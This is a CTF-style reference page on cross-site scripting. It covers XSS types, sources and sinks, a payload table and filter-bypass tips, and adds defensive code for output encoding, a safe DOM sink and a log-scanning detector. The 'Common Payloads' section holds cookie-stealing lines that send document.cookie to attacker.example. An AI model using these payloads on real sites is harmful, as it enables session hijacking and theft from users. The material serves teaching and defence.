CTF Support

Cross-Site Scripting (XSS)

Introduction

Cross-Site Scripting (XSS) vulnerabilities allow attackers to inject JavaScript into a webpage viewed by other users. They commonly appear where request parameters, form fields, or stored data are written back into the page without proper output sanitization.


Types

| Type      | Description |
|-----------|-------------|
| Reflected | Payload included in the request and immediately reflected back to the user. |
| Stored    | Payload stored permanently on the server (e.g., in a database). |
| DOM-Based | Payload executed in the browser without server interaction by modifying the DOM. |

Sources and Sinks

  • Sources - Where user data enters the page logic, such as: location.hash, document.URL, document.referrer
  • Sinks - Where that data is written to the page, like: document.write(), innerHTML, eval(), setTimeout(), Element.innerText

Rule of thumb: danger arises when untrusted data flows from a Source to a Sink without sanitization.


Quick Reference

| Context     | Example | Notes |
|-------------|---------|-------|
| HTML        | <script>alert(1)</script> | Standard test |
| Attribute   | <img src=x onerror=alert(1)> | Event handler |
| URL         | javascript:alert(1) | Clickable JavaScript scheme |
| CSS / Style | <div style="background:url(javascript:alert(1))"> | Rare but possible |
| SVG         | <svg/onload=alert(1)> | Common filter bypass |
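Each row of the table is a different output context, and the defence differs per context: the same value needs a different encoding depending on whether it lands in HTML text, an attribute value, or a URL. The following is an added example (not code from the original page) of context-aware output encoding in JavaScript; the encoder names, the `renderProfileCard` helper and the `example.invalid` base URL are this example's own choices.

```javascript
// Added example (not from the original page): context-aware output encoding
// for the contexts in the Quick Reference table. The same untrusted value must
// be encoded differently depending on where it is written.

// HTML body context: escape the characters that can start markup or end text.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

function encodeForHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Attribute value context: encode everything outside [A-Za-z0-9] as a hex
// entity and always quote the attribute at the call site. This neutralises
// payloads that rely on breaking out of an unquoted attribute, e.g. the table's
// `x onerror=alert(1)`.
function encodeForAttribute(value) {
  return String(value).replace(/[^A-Za-z0-9]/gu,
    (ch) => `&#x${ch.codePointAt(0).toString(16)};`);
}

// URL context (href/src): parse with the URL API and allow only http(s).
// Parsing instead of prefix-matching handles the variants browsers accept,
// such as mixed case or tabs/newlines inside "javascript:". The base URL is a
// placeholder chosen for this example.
function safeUrl(value, base = "https://example.invalid/") {
  let url;
  try {
    url = new URL(String(value), base);
  } catch {
    return "#"; // unparseable input: emit an inert link
  }
  return url.protocol === "http:" || url.protocol === "https:" ? url.href : "#";
}

// A hypothetical profile card rendered from untrusted fields, each field passed
// through the encoder for the context it lands in. URLs are validated first and
// then HTML-encoded because they sit inside a quoted attribute.
function renderProfileCard(profile) {
  return [
    '<div class="card">',
    `  <h2>${encodeForHtml(profile.displayName)}</h2>`,
    `  <img src="${encodeForHtml(safeUrl(profile.avatarUrl))}" alt="${encodeForAttribute(profile.displayName)}">`,
    `  <a href="${encodeForHtml(safeUrl(profile.homepage))}">Homepage</a>`,
    "</div>",
  ].join("\n");
}

console.log(renderProfileCard({
  displayName: "<script>alert(1)</script>",
  avatarUrl: "javascript:alert(1)",
  homepage: "https://example.com/?a=1&b=2",
}));
```

Note that `safeUrl` does not try to enumerate dangerous schemes; it allowlists the two that are expected and lets the URL parser do the normalisation, which is why a value with a tab and a newline spliced into `javascript:` is still rejected.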

Common Payloads

Basic Proofs of Concept

<script>alert(document.domain)</script>
<img src=x onerror=alert(document.domain)>
<a href="javascript:alert(document.cookie)">Click Me</a>

Redirect and log cookie:

document.location = "https://attacker.example/?c=" + document.cookie

Stealth exfiltration via image request:

document.write('<img src="https://attacker.example/collect.gif?cookie=' + document.cookie + '">')

or

<img src=x onerror=this.src='https://attacker.example/?c='+document.cookie>

DOM-Based Example

var search = location.hash.substring(1); // Source
document.getElementById("output").innerHTML = search; // Sink

Visiting https://target/#<img src=x onerror=alert(1)> executes the script entirely client-side.
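As an added example (not from the original page), here is the snippet above rewritten so the hash Source never reaches an HTML-interpreting Sink, which also illustrates the Source/Sink rule from the earlier section. The element and document are passed in as parameters so the functions can be tested outside a browser; `readSearchFromHash`, `renderSearchTerm` and `renderHighlighted` are names chosen for this example.

```javascript
// Added example (not from the original page): the DOM-based snippet above
// rewritten so the hash Source never reaches an HTML-interpreting Sink. The
// element and document are passed in as parameters so the functions can be
// tested outside a browser; in the page they would be
// document.getElementById("output") and document.

// Source: the fragment without its leading "#". A fragment may arrive
// percent-encoded, so decode it once; decodeURIComponent throws on malformed
// sequences, which we treat as empty input rather than passing them through.
function readSearchFromHash(hash) {
  const raw = String(hash).replace(/^#/, "");
  try {
    return decodeURIComponent(raw);
  } catch {
    return "";
  }
}

// Sink: textContent creates text nodes, so "<img src=x onerror=alert(1)>" is
// displayed literally and never parsed as markup. Replacing innerHTML with
// textContent is the whole fix for the snippet above.
function renderSearchTerm(outputEl, term) {
  outputEl.textContent = term;
  return outputEl;
}

// When markup around the value is genuinely needed, build it with DOM APIs and
// keep the untrusted string in a text node or a non-executable attribute set
// through setAttribute, never by concatenating an HTML string.
function renderHighlighted(doc, outputEl, term) {
  outputEl.textContent = ""; // clear previous children
  const label = doc.createTextNode("Results for ");
  const strong = doc.createElement("strong");
  strong.textContent = term;
  strong.setAttribute("data-term", term);
  outputEl.appendChild(label);
  outputEl.appendChild(strong);
  return outputEl;
}

// Page wiring; runs only when a real browser document exists.
if (typeof document !== "undefined" && typeof location !== "undefined") {
  const out = document.getElementById("output");
  if (out) renderHighlighted(document, out, readSearchFromHash(location.hash));
}
```

The vulnerable original and this version read the same Source; the difference is entirely in the Sink, which is why the Source/Sink view is the useful one when auditing client-side code.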


Tips

  • Use the browser’s developer console to observe reflected parameters.
  • Encode payloads for bypass: &lt;script&gt;alert(1)&lt;/script&gt;
  • Bypass filters with alternate encodings or event handlers (onfocus, onmouseover).
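From the defender's side, the payloads in Common Payloads and the encoding variants in Tips share a small set of shapes that can be spotted in web server access logs once the request target is normalised. The following added example (not from the original page) scans constructed combined-format log lines in JavaScript; the indicator names, hostnames and sample entries are made up for the example, and the client addresses are documentation ranges.

```javascript
// Added example (not from the original page): a log-side detector for the
// payload shapes listed under Common Payloads and the encoding variants in
// Tips. Indicator names, hostnames and log lines are constructed for this
// example; the client addresses are documentation ranges.

const INDICATORS = [
  { name: "script-tag",     re: /<\s*script\b/i },
  { name: "event-handler",  re: /\bon(?:error|load|focus|mouseover|click)\s*=/i },
  { name: "javascript-uri", re: /javascript\s*:/i },
  { name: "svg-onload",     re: /<\s*svg\b[^>]*onload/i },
  { name: "cookie-access",  re: /document\s*\.\s*cookie/i },
];

// Convert a code point to a string, ignoring values outside the Unicode range
// that would otherwise make String.fromCodePoint throw.
function codePointToString(n) {
  return n >= 0 && n <= 0x10ffff ? String.fromCodePoint(n) : "";
}

// Normalise a request target before matching: treat "+" as space, strip
// percent-encoding until it stops changing (bounded, so "%253C" and "%3C" both
// become "<"), then decode the HTML entities that matter for markup.
function normalize(target, maxRounds = 3) {
  let s = String(target).replace(/\+/g, " ");
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(s);
    } catch {
      break; // malformed %-sequence: keep what we have
    }
    if (next === s) break;
    s = next;
  }
  return s
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => codePointToString(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => codePointToString(Number(d)))
    .replace(/&(lt|gt|quot|amp|apos);/gi, (_, n) =>
      ({ lt: "<", gt: ">", quot: '"', amp: "&", apos: "'" })[n.toLowerCase()]);
}

// Combined log format: client, identity, user, [time], "method target proto", status, ...
const LOG_LINE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /;

// Return a finding for one line, or null when it does not parse or is clean.
function scanLine(line) {
  const m = LOG_LINE.exec(line);
  if (!m) return null;
  const [, client, time, method, target, status] = m;
  const decoded = normalize(target);
  const indicators = INDICATORS.filter((ind) => ind.re.test(decoded)).map((ind) => ind.name);
  return indicators.length ? { client, time, method, target, status, indicators } : null;
}

function scanLog(text) {
  return text.split("\n").map(scanLine).filter(Boolean);
}

// Constructed sample: three reflected attempts in different encodings, the
// cookie-stealing img payload from the section above, and one benign search.
const SAMPLE_LOG = [
  '203.0.113.10 - - [10/Mar/2024:12:00:01 +0000] "GET /search?q=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.10 - - [10/Mar/2024:12:00:07 +0000] "GET /search?q=%26lt%3Bimg+src%3Dx+onerror%3Dalert(1)%26gt%3B HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
  '203.0.113.11 - - [10/Mar/2024:12:00:09 +0000] "GET /profile?next=javascript%3Aalert(1) HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [10/Mar/2024:12:01:15 +0000] "GET /comment?text=%3Cimg%20src%3Dx%20onerror%3Dthis.src%3D%27https%3A%2F%2Fattacker.example%2F%3Fc%3D%27%2Bdocument.cookie%3E HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
  '198.51.100.8 - - [10/Mar/2024:12:02:00 +0000] "GET /search?q=cats+and+dogs HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
].join("\n");

for (const f of scanLog(SAMPLE_LOG)) {
  console.log(`${f.time} ${f.client} ${f.method} ${f.target} -> ${f.indicators.join(", ")}`);
}
```

The normalisation step is what makes the Tips relevant to detection: the second sample line carries the entity-encoded form from the list above, wrapped in a further layer of percent-encoding, and still resolves to the same `onerror=` indicator as the plain payload. Matching on decoded content rather than raw bytes is the difference between a rule that catches the bypass and one that does not.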